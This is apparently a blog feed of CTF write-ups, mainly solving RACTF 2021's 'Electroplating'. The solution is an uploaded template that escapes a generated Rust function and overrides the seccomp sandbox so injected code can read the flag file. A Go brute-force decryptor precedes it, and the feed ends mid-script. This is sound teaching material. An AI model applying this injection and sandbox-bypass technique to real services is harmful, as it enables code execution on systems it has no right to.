<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="nb">len</span><span class="p">(</span><span class="nx">os</span><span class="p">.</span><span class="nx">Args</span><span class="p">)</span><span class="w"> </span><span class="o"><=</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">log</span><span class="p">.</span><span class="nx">Println</span><span class="p">(</span><span class="s">"No ciphertext given -> Ending now"</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="nx">ciphertextWithoutIV</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nx">os</span><span class="p">.</span><span class="nx">Args</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="w"> </span><span class="nx">log</span><span class="p">.</span><span class="nx">Println</span><span class="p">(</span><span class="s">"Decrypting "</span><span class="o">+</span><span class="w"> </span><span class="nx">ciphertextWithoutIV</span><span class="p">)</span>
<span class="w"> </span><span class="c1">// iterate twice over the 12 bit number range</span>
<span class="w"> </span><span class="c1">// first with bit 24 set to 0</span>
<span class="w"> </span><span class="c1">// second with bit 24 set to 1</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="nx">flipBit24</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="nx">flipBit24</span><span class="w"> </span><span class="p"><</span><span class="w"> </span><span class="mi">2</span><span class="p">;</span><span class="w"> </span><span class="nx">flipBit24</span><span class="o">++</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="nx">j</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="nx">j</span><span class="w"> </span><span class="p"><</span><span class="w"> </span><span class="p">(</span><span class="mi">1</span><span class="o"><<</span><span class="mi">12</span><span class="p">);</span><span class="w"> </span><span class="nx">j</span><span class="o">++</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">seed</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="nb">int64</span><span class="p">(</span><span class="nx">j</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="nx">flipBit24</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">seed</span><span class="w"> </span><span class="o">|=</span><span class="w"> </span><span class="nb">int64</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o"><<</span><span class="mi">24</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="nx">rand</span><span class="p">.</span><span class="nx">Seed</span><span class="p">(</span><span class="nx">seed</span><span class="p">)</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="nx">k</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="nx">k</span><span class="w"> </span><span class="p"><</span><span class="w"> </span><span class="nx">rand</span><span class="p">.</span><span class="nx">Intn</span><span class="p">(</span><span class="mi">32</span><span class="p">);</span><span class="w"> </span><span class="nx">k</span><span class="o">++</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">rand</span><span class="p">.</span><span class="nx">Seed</span><span class="p">(</span><span class="nx">rand</span><span class="p">.</span><span class="nx">Int63</span><span class="p">())</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="kd">var</span><span class="w"> </span><span class="nx">key</span><span class="w"> </span><span class="p">[]</span><span class="kt">byte</span>
<span class="w"> </span><span class="kd">var</span><span class="w"> </span><span class="nx">iv</span><span class="w"> </span><span class="p">[]</span><span class="kt">byte</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="nx">k</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="nx">k</span><span class="w"> </span><span class="p"><</span><span class="w"> </span><span class="mi">32</span><span class="p">;</span><span class="w"> </span><span class="nx">k</span><span class="o">++</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">key</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="nb">append</span><span class="p">(</span><span class="nx">key</span><span class="p">,</span><span class="w"> </span><span class="nb">byte</span><span class="p">(</span><span class="nx">rand</span><span class="p">.</span><span class="nx">Intn</span><span class="p">(</span><span class="mi">255</span><span class="p">)))</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="nx">k</span><span class="w"> </span><span class="o">:=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="nx">k</span><span class="w"> </span><span class="p"><</span><span class="w"> </span><span class="nx">aes</span><span class="p">.</span><span class="nx">BlockSize</span><span class="p">;</span><span class="w"> </span><span class="nx">k</span><span class="o">++</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">iv</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="nb">append</span><span class="p">(</span><span class="nx">iv</span><span class="p">,</span><span class="w"> </span><span class="nb">byte</span><span class="p">(</span><span class="nx">rand</span><span class="p">.</span><span class="nx">Intn</span><span class="p">(</span><span class="mi">255</span><span class="p">)))</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="nx">ciphertext</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="nx">hex</span><span class="p">.</span><span class="nx">EncodeToString</span><span class="p">(</span><span class="nx">iv</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nx">ciphertextWithoutIV</span>
<span class="w"> </span><span class="nx">plaintext</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="nx">decrypt</span><span class="p">(</span><span class="nx">ciphertext</span><span class="p">,</span><span class="w"> </span><span class="nx">key</span><span class="p">,</span><span class="w"> </span><span class="nx">aes</span><span class="p">.</span><span class="nx">BlockSize</span><span class="p">)</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="nx">strings</span><span class="p">.</span><span class="nx">Index</span><span class="p">(</span><span class="nx">plaintext</span><span class="p">,</span><span class="w"> </span><span class="s">"ractf{"</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">||</span><span class="w"> </span><span class="nx">strings</span><span class="p">.</span><span class="nx">Index</span><span class="p">(</span><span class="nx">plaintext</span><span class="p">,</span><span class="w"> </span><span class="s">"[REDACTED]"</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nb">print</span><span class="p">(</span><span class="nx">plaintext</span><span class="p">)</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">}</span>
<span class="p">}</span>
</code></pre></div>Really Awesome CTF 20212021-08-13T00:00:00+02:002021-08-13T00:00:00+02:00moormastertag:moormaster.codeberg.page,2021-08-13:/CtfWriteups/really-awesome-ctf-2021.html<p>URL: <a href="https://www.ractf.co.uk/">RACTF2021</a></p>
<p>Github: <a href="https://github.com/ractf">ractf</a></p>
<p>Writeups can be found at <a href="https://moormaster.codeberg.page/CtfWriteups/category/really-awesome-ctf-2021.html">Really Awesome CTF 2021</a></p>Electroplating2021-08-09T00:00:00+02:002021-08-09T00:00:00+02:00moormastertag:moormaster.codeberg.page,2021-08-09:/CtfWriteups/electroplating.html<p>We are given a docker container that presents us a gunicorn web-app. Just as in the Fancy Button Generator challenge we are asked to verify our session using the api-endpoint at location /pow. By looking at the app.py we can see that this time the difficulty was increased to …</p><p>We are given a docker container that presents us a gunicorn web-app. Just as in the Fancy Button Generator challenge we are asked to verify our session using the api-endpoint at location /pow. By looking at the app.py we can see that this time the difficulty was increased to 6:</p>
<div class="highlight"><pre><span></span><code><span class="nd">@app</span><span class="o">.</span><span class="n">route</span><span class="p">(</span><span class="s2">"/pow"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s2">"GET"</span><span class="p">,</span> <span class="s2">"POST"</span><span class="p">])</span>
<span class="k">def</span><span class="w"> </span><span class="nf">do_pow</span><span class="p">():</span>
<span class="k">if</span> <span class="n">request</span><span class="o">.</span><span class="n">method</span> <span class="o">==</span> <span class="s1">'GET'</span><span class="p">:</span>
<span class="o">...</span>
<span class="k">else</span><span class="p">:</span>
<span class="kn">import</span><span class="w"> </span><span class="nn">pow</span>
<span class="n">difficulty</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">getenv</span><span class="p">(</span><span class="s2">"DIFFICULTY"</span><span class="p">,</span> <span class="s2">"6"</span><span class="p">))</span>
<span class="n">pref</span><span class="p">,</span> <span class="n">suff</span> <span class="o">=</span> <span class="n">session</span><span class="p">[</span><span class="s1">'pref'</span><span class="p">],</span> <span class="n">session</span><span class="p">[</span><span class="s1">'suff'</span><span class="p">]</span>
<span class="n">answer</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">json</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'answer'</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">pow</span><span class="o">.</span><span class="n">verify</span><span class="p">(</span><span class="n">pref</span><span class="p">,</span> <span class="n">suff</span><span class="p">,</span> <span class="n">answer</span><span class="p">,</span> <span class="n">difficulty</span><span class="p">):</span>
<span class="n">session</span><span class="p">[</span><span class="s1">'verified'</span><span class="p">]</span> <span class="o">=</span> <span class="kc">True</span>
<span class="n">session</span><span class="p">[</span><span class="s1">'end'</span><span class="p">]</span> <span class="o">=</span> <span class="n">time</span><span class="o">.</span><span class="n">time</span><span class="p">()</span> <span class="o">+</span> <span class="mi">30</span>
<span class="k">return</span> <span class="s2">"Thank you!"</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="s2">"POW incorrect"</span>
</code></pre></div>
<p>For experimenting with the docker container it is a good idea to lower the difficulty when testing locally. By further looking at the source code of the Docker image we find a skeleton directory for a web application written in rust as well as an flask based python web application. In the app.py we find out about what the / endpoint does</p>
<div class="highlight"><pre><span></span><code><span class="nd">@app</span><span class="o">.</span><span class="n">route</span><span class="p">(</span><span class="s1">'/'</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s1">'GET'</span><span class="p">,</span> <span class="s1">'POST'</span><span class="p">])</span>
<span class="k">def</span><span class="w"> </span><span class="nf">upload_file</span><span class="p">():</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">session</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'verified'</span><span class="p">):</span>
<span class="k">return</span> <span class="s2">"Please complete <pre>/pow</pre>"</span><span class="p">,</span> <span class="mi">403</span>
<span class="n">os</span><span class="o">.</span><span class="n">chdir</span><span class="p">(</span><span class="s1">'/app'</span><span class="p">)</span>
<span class="k">if</span> <span class="n">request</span><span class="o">.</span><span class="n">method</span> <span class="o">==</span> <span class="s1">'POST'</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">file</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">files</span><span class="p">[</span><span class="s1">'file'</span><span class="p">]</span>
<span class="n">path</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="s1">'uploads'</span><span class="p">,</span> <span class="n">secure_filename</span><span class="p">(</span><span class="n">file</span><span class="o">.</span><span class="n">filename</span><span class="p">))</span>
<span class="n">file</span><span class="o">.</span><span class="n">save</span><span class="p">(</span><span class="n">path</span><span class="p">)</span>
<span class="n">response</span> <span class="o">=</span> <span class="n">get_result</span><span class="p">(</span><span class="n">path</span><span class="p">)</span>
<span class="n">os</span><span class="o">.</span><span class="n">remove</span><span class="p">(</span><span class="n">path</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
<span class="n">response</span> <span class="o">=</span> <span class="n">traceback</span><span class="o">.</span><span class="n">format_exc</span><span class="p">()</span>
<span class="k">del</span> <span class="n">session</span><span class="p">[</span><span class="s1">'verified'</span><span class="p">]</span>
<span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s1">'upload.html'</span><span class="p">,</span> <span class="n">response</span><span class="o">=</span><span class="n">response</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s1">'upload.html'</span><span class="p">)</span>
</code></pre></div>
<p>After the session was verified we are presented with a file upload widget in the browser. The challenge also provides an example file template.htmlrs which will be accepted by the uploader:</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">html</span><span class="p">></span>
<span class="p"><</span><span class="nt">title</span><span class="p">><</span><span class="nt">templ</span><span class="p">></span>"Page Title".to_string()<span class="p"></</span><span class="nt">templ</span><span class="p">></</span><span class="nt">title</span><span class="p">></span>
<span class="p"><</span><span class="nt">h1</span><span class="p">><</span><span class="nt">templ</span><span class="p">></span>"bruh".to_string()<span class="p"></</span><span class="nt">templ</span><span class="p">></</span><span class="nt">h1</span><span class="p">></span>
<span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>
<p>The template file seems to contain rust code inside of each <templ> tag. But how does the python app manage to interprete these expressions correctly? The magic happens within the get_result() function found in the app.py. We find two variables containing a code template for a web-application written in rust and the other containing a code template for a rust methods. </p>
<div class="highlight"><pre><span></span><code><span class="n">rust_template</span> <span class="o">=</span> <span class="s2">"""</span>
<span class="s2">#![allow(warnings, unused)]</span>
<span class="s2">use std::collections::HashMap;</span>
<span class="s2">use std::fs;</span>
<span class="s2">use std::env;</span>
<span class="s2">extern crate seccomp;</span>
<span class="s2">extern crate libc;</span>
<span class="s2">extern crate tiny_http;</span>
<span class="s2">extern crate seccomp_sys;</span>
<span class="s2">use seccomp::*;</span>
<span class="s2">use tiny_http::{Server, Response, Header, Request};</span>
<span class="s2">static ALLOWED: &'static [usize] = &[0, 1, 3, 11, 44,</span>
<span class="s2"> 60, 89, 131, 202,</span>
<span class="s2"> 231, 318];</span>
<span class="s2">fn main() {</span>
<span class="s2"> let mut dir = env::current_exe().unwrap();</span>
<span class="s2"> dir.pop();</span>
<span class="s2"> dir.push("../../app.htmlrs");</span>
<span class="s2"> let template = fs::read_to_string(dir.to_str().unwrap()).unwrap();</span>
<span class="s2"> let server = Server::http("127.0.0.1:</span><span class="si">%s</span><span class="s2">").unwrap();</span>
<span class="s2"> apply_seccomp();</span>
<span class="s2"> for request in server.incoming_requests() {</span>
<span class="s2"> println!("received request! method: {:?}, url: {:?}",</span>
<span class="s2"> request.method(),</span>
<span class="s2"> request.url(),</span>
<span class="s2"> );</span>
<span class="s2"> handle_request(request, &template);</span>
<span class="s2"> std::process::exit(0);</span>
<span class="s2"> }</span>
<span class="s2">}</span>
<span class="s2">fn handle_request(req: Request, template: &String) {</span>
<span class="s2"> let mut methods: HashMap<_, fn() -> String> = HashMap::new();</span>
<span class="s2"> </span><span class="si">%s</span>
<span class="s2"> let mut html = template.clone();</span>
<span class="s2"> for (name, fun) in methods.iter() {</span>
<span class="s2"> html = html.replace(name, &fun());</span>
<span class="s2"> }</span>
<span class="s2"> let header = Header::from_bytes(</span>
<span class="s2"> &b"Content-Type"[..], &b"text/html"[..]</span>
<span class="s2"> ).unwrap();</span>
<span class="s2"> let mut response = Response::from_string(html);</span>
<span class="s2"> response.add_header(header);</span>
<span class="s2"> req.respond(response).unwrap();</span>
<span class="s2">}</span>
<span class="s2">fn apply_seccomp() {</span>
<span class="s2"> let mut ctx = Context::default(Action::KillProcess).unwrap();</span>
<span class="s2"> for i in ALLOWED {</span>
<span class="s2"> let rule = Rule::new(*i, None, Action::Allow);</span>
<span class="s2"> ctx.add_rule(rule).unwrap();</span>
<span class="s2"> }</span>
<span class="s2"> ctx.load();</span>
<span class="s2">}</span>
<span class="si">%s</span>
<span class="s2">"""</span>
<span class="n">templ_fun</span> <span class="o">=</span> <span class="s2">"""</span>
<span class="s2">fn temp</span><span class="si">%s</span><span class="s2">() -> String {</span>
<span class="s2"> </span><span class="si">%s</span>
<span class="s2">}</span>
<span class="s2">"""</span>
</code></pre></div>
<p>The get_result() function creates a copy of the skeleton directory containing the rust web-application. It uses the function template variable to create a rust method for each <templ> tag found in the uploaded file and puts the contents of each tags into the function body. The new rust methods are then injected into the rust code template found in the rust_template variable. The final result is written into an appp.htmlrs file inside of the copied skeleton directory before it gets executed in a separate process. After that the python part tries to reach the rust web-api endpoint to receive the rendered html contents.</p>
<div class="highlight"><pre><span></span><code><span class="k">def</span><span class="w"> </span><span class="nf">get_result</span><span class="p">(</span><span class="n">template_path</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">template_path</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">templ</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="k">with</span> <span class="n">tempfile</span><span class="o">.</span><span class="n">TemporaryDirectory</span><span class="p">()</span> <span class="k">as</span> <span class="n">tmpdir</span><span class="p">:</span>
<span class="n">shutil</span><span class="o">.</span><span class="n">copytree</span><span class="p">(</span><span class="s1">'skeleton'</span><span class="p">,</span> <span class="n">tmpdir</span><span class="p">,</span> <span class="n">dirs_exist_ok</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="n">os</span><span class="o">.</span><span class="n">chdir</span><span class="p">(</span><span class="n">tmpdir</span><span class="p">)</span>
<span class="n">port</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">40000</span><span class="p">,</span> <span class="mi">50000</span><span class="p">))</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'src/main.rs'</span><span class="p">,</span> <span class="s1">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">soup</span> <span class="o">=</span> <span class="n">BeautifulSoup</span><span class="p">(</span><span class="n">templ</span><span class="p">,</span> <span class="s1">'html.parser'</span><span class="p">)</span>
<span class="n">funcs</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">temp</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">soup</span><span class="o">.</span><span class="n">find_all</span><span class="p">(</span><span class="s1">'templ'</span><span class="p">)):</span>
<span class="n">funcs</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">templ_fun</span> <span class="o">%</span> <span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">temp</span><span class="o">.</span><span class="n">text</span><span class="p">))</span>
<span class="n">templ</span> <span class="o">=</span> <span class="n">templ</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="sa">f</span><span class="s1">'<templ></span><span class="si">{</span><span class="n">temp</span><span class="o">.</span><span class="n">text</span><span class="si">}</span><span class="s1"></templ>'</span><span class="p">,</span> <span class="sa">f</span><span class="s1">'temp</span><span class="si">{</span><span class="n">i</span><span class="si">}</span><span class="s1">'</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
<span class="n">hashmap</span> <span class="o">=</span> <span class="s2">""</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">funcs</span><span class="p">)):</span>
<span class="n">hashmap</span> <span class="o">+=</span> <span class="sa">f</span><span class="s2">"""methods.insert("temp</span><span class="si">{</span><span class="n">i</span><span class="si">}</span><span class="s2">", temp</span><span class="si">{</span><span class="n">i</span><span class="si">}</span><span class="s2">);</span><span class="se">\n</span><span class="s2">"""</span>
<span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">rust_template</span> <span class="o">%</span> <span class="p">(</span><span class="n">port</span><span class="p">,</span> <span class="n">hashmap</span><span class="p">,</span> <span class="s1">'</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">funcs</span><span class="p">)))</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'app.htmlrs'</span><span class="p">,</span> <span class="s1">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">templ</span><span class="p">)</span>
<span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s1">'cargo run --offline --verbose &'</span><span class="p">)</span>
<span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">10</span><span class="p">):</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="sa">f</span><span class="s1">'http://localhost:</span><span class="si">{</span><span class="n">port</span><span class="si">}</span><span class="s1">'</span><span class="p">)</span>
<span class="n">os</span><span class="o">.</span><span class="n">chdir</span><span class="p">(</span><span class="s1">'/app'</span><span class="p">)</span>
<span class="k">return</span> <span class="n">r</span><span class="o">.</span><span class="n">text</span>
<span class="k">except</span><span class="p">:</span>
<span class="k">return</span> <span class="n">traceback</span><span class="o">.</span><span class="n">format_exc</span><span class="p">()</span>
<span class="k">return</span> <span class="s2">"App failed to start"</span>
</code></pre></div>
<p>The challenge here seems to be easy at first as we just need to place the correct rust code inside of one of the <templ> tags in the uploaded file to open and read the flag.txt file:</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">html</span><span class="p">></span>
<span class="p"><</span><span class="nt">title</span><span class="p">><</span><span class="nt">templ</span><span class="p">></span>fs::read_to_string("/flag.txt").unwrap()<span class="p"></</span><span class="nt">templ</span><span class="p">></</span><span class="nt">title</span><span class="p">></span>
<span class="p"><</span><span class="nt">h1</span><span class="p">><</span><span class="nt">templ</span><span class="p">></span>"bruh".to_string()<span class="p"></</span><span class="nt">templ</span><span class="p">></</span><span class="nt">h1</span><span class="p">></span>
<span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>
<p>However this attempt fails because the rust application uses the seccomp library to limit the system calls that are allowed to do:</p>
<div class="highlight"><pre><span></span><code><span class="k">use</span><span class="w"> </span><span class="n">seccomp</span><span class="p">::</span><span class="o">*</span><span class="p">;</span>
<span class="o">..</span><span class="p">.</span>
<span class="k">static</span><span class="w"> </span><span class="n">ALLOWED</span><span class="p">:</span><span class="w"> </span><span class="kp">&</span><span class="o">'</span><span class="nb">static</span><span class="w"> </span><span class="p">[</span><span class="kt">usize</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">&</span><span class="p">[</span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="mi">3</span><span class="p">,</span><span class="w"> </span><span class="mi">11</span><span class="p">,</span><span class="w"> </span><span class="mi">44</span><span class="p">,</span>
<span class="w"> </span><span class="mi">60</span><span class="p">,</span><span class="w"> </span><span class="mi">89</span><span class="p">,</span><span class="w"> </span><span class="mi">131</span><span class="p">,</span><span class="w"> </span><span class="mi">202</span><span class="p">,</span>
<span class="w"> </span><span class="mi">231</span><span class="p">,</span><span class="w"> </span><span class="mi">318</span><span class="p">];</span>
<span class="o">..</span><span class="p">.</span>
<span class="k">fn</span><span class="w"> </span><span class="nf">apply_seccomp</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="k">mut</span><span class="w"> </span><span class="n">ctx</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">Context</span><span class="p">::</span><span class="n">default</span><span class="p">(</span><span class="n">Action</span><span class="p">::</span><span class="n">KillProcess</span><span class="p">).</span><span class="n">unwrap</span><span class="p">();</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="n">ALLOWED</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="n">rule</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">Rule</span><span class="p">::</span><span class="n">new</span><span class="p">(</span><span class="o">*</span><span class="n">i</span><span class="p">,</span><span class="w"> </span><span class="nb">None</span><span class="p">,</span><span class="w"> </span><span class="n">Action</span><span class="p">::</span><span class="n">Allow</span><span class="p">);</span>
<span class="w"> </span><span class="n">ctx</span><span class="p">.</span><span class="n">add_rule</span><span class="p">(</span><span class="n">rule</span><span class="p">).</span><span class="n">unwrap</span><span class="p">();</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">ctx</span><span class="p">.</span><span class="n">load</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div>
<p>By looking at the beginning of the rust_template variable we can see that the seccomp namespace is not imported but only its contents. This gives us the chance to create the same classes as provided by the lib.rs but with manipulated behaviour. By injecting our own manipulated "Context" class into the uploaded file we can prevent the rust application from applying the seccomp rules into the kernel:</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">html</span><span class="p">></span>
<span class="p"><</span><span class="nt">title</span><span class="p">><</span><span class="nt">templ</span><span class="p">></span>fs::read_to_string("/flag.txt").unwrap()<span class="p"></</span><span class="nt">templ</span><span class="p">></</span><span class="nt">title</span><span class="p">></span>
<span class="p"><</span><span class="nt">h1</span><span class="p">><</span><span class="nt">templ</span><span class="p">></span>
"anything".to_string()
// / 1) escape from temp1() method definition by putting a } here
}
// / 2) seccomp reimplementation - copied from lib.rs and manipulated to allow everything
// / this works because the seccomp::Context object is imported with * and instanciated without
// / using its original namespace seccomp::
// / <span class="cp"><![CDATA[</span>
<span class="cp">// / Note: the CDATA section enables us to use "<" and ">" (prevents the html parser from recognizing tags in here)</span>
<span class="cp">use seccomp_sys::scmp_compare::*;</span>
<span class="cp">use seccomp_sys::*;</span>
<span class="cp">#[derive(Debug)]</span>
<span class="cp">pub struct SeccompError {</span>
<span class="cp"> msg: String,</span>
<span class="cp">}</span>
<span class="cp">impl SeccompError {</span>
<span class="cp"> fn new<T: Into<String>>(msg: T) -> Self {</span>
<span class="cp"> SeccompError { msg: msg.into() }</span>
<span class="cp"> }</span>
<span class="cp">}</span>
<span class="cp">#[derive(Debug)]</span>
<span class="cp">pub struct Context {</span>
<span class="cp"> int: *mut scmp_filter_ctx,</span>
<span class="cp">}</span>
<span class="cp">impl Context {</span>
<span class="cp"> /// Creates new context with default action</span>
<span class="cp"> pub fn default(def_action: Action) -> Result<Context, SeccompError> {</span>
<span class="cp"> let filter_ctx = unsafe { seccomp_init(Action::Allow.into()) };</span>
<span class="cp"> if filter_ctx.is_null() {</span>
<span class="cp"> return Err(SeccompError::new("initialization failed"));</span>
<span class="cp"> }</span>
<span class="cp"> Ok(Context { int: filter_ctx })</span>
<span class="cp"> }</span>
<span class="cp"> /// Adds rule to the context</span>
<span class="cp"> pub fn add_rule(&mut self, rule: Rule) -> Result<(), SeccompError> {</span>
<span class="cp"> Ok(())</span>
<span class="cp"> }</span>
<span class="cp"> /// Loads the filter into the kernel. Rules will be applied when this function returns.</span>
<span class="cp"> pub fn load(&self) -> Result<(), SeccompError> {</span>
<span class="cp"> Ok(())</span>
<span class="cp"> }</span>
<span class="cp">}</span>
<span class="cp">// / ]]></span>
// / 3) defining another method to have valid syntax - the } will be added by the app.py
fn anyMethod() -> String {
"hello".to_string()
<span class="p"></</span><span class="nt">templ</span><span class="p">></</span><span class="nt">h1</span><span class="p">></span>
<span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>
<p>Now all we need to do is upload this file and the flag will be presented to us as replacement for the first <templ> tag.</p>
<p>The Fancy Button Generator challenge already gave us the template-solve.py file which automates session verification and file uploading for us. A slight modification allows us to use it for both - local testing and solving the remote challenge:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span><span class="w"> </span><span class="nn">requests</span>
<span class="kn">import</span><span class="w"> </span><span class="nn">hashlib</span>
<span class="kn">import</span><span class="w"> </span><span class="nn">uuid</span>
<span class="kn">import</span><span class="w"> </span><span class="nn">binascii</span>
<span class="kn">import</span><span class="w"> </span><span class="nn">os</span>
<span class="kn">import</span><span class="w"> </span><span class="nn">sys</span>
<span class="k">def</span><span class="w"> </span><span class="nf">generate</span><span class="p">():</span>
<span class="k">return</span> <span class="n">uuid</span><span class="o">.</span><span class="n">uuid4</span><span class="p">()</span><span class="o">.</span><span class="n">hex</span><span class="p">[:</span><span class="mi">4</span><span class="p">],</span> <span class="n">uuid</span><span class="o">.</span><span class="n">uuid4</span><span class="p">()</span><span class="o">.</span><span class="n">hex</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span>
<span class="k">def</span><span class="w"> </span><span class="nf">verify</span><span class="p">(</span><span class="n">prefix</span><span class="p">,</span> <span class="n">suffix</span><span class="p">,</span> <span class="n">answer</span><span class="p">,</span> <span class="n">difficulty</span><span class="o">=</span><span class="mi">6</span><span class="p">):</span>
